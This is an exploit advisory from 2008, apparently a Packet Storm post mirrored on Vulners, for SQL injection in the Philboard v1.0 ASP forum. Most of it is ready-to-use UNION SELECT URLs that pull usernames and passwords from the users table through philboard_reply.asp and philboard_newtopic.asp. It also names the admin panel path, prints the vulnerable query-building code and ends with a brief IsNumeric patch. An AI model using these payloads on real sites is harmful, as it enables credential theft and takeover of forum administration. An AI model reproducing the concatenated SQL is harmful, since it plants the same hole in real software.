Lucene search
K

philboard1-sql.txt

🗓️ 21 Apr 2008 00:00:00Reported by U238Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Philboard W1L3D4 v1.0 Multiple SQL İnjection Vulnerable. Details about the Philboard version 1.0 SQL injection vulnerability, including specific URLs for exploits and targeted script files

Code
`Philboard W1L3D4 v1.0 Multiple SQL İnjection Vulnerable  
  
Author : U238   
  
mail : setuid.noexec0x1[aq]hotmail[dot]com  
  
webpage: http://noexec.blogspot.com  
  
  
Script : http://www.aspindir.com/Goster/4703  
  
Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html  
  
-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_  
  
  
[0x1] Exploit:  
  
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users  
  
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users  
  
*  
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users  
  
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users  
  
  
  
-----------------------  
  
  
http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users  
  
http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users  
  
  
-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-  
  
[0x2] Admin Panel  
  
  
target/philboard/philboard_admin.asp  
  
  
  
  
  
[0x3] Error File :   
  
philboard_newtopic.asp  
  
philboard_reply.asp  
  
  
[0x3] Error Code :   
  
  
id = Request.QueryString("id")  
  
recordnum = Request.QueryString("recordnum")  
  
sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id  
  
  
  
  
[-] Patched ? [-]   
  
id = Request.QueryString("id")  
IF Not IsNumeric(request.querystring("id")) THEN  
Response.write "sql injection mu arıyon yawrucum,anam? !!"   
Response.End  
END IF  
  
* This Code , application make to included error file..   
  
  
  
  
------------------------------  
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak  
  
[0x5] U238 | Web - Designer Developer Solutions  
  
-----------------------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation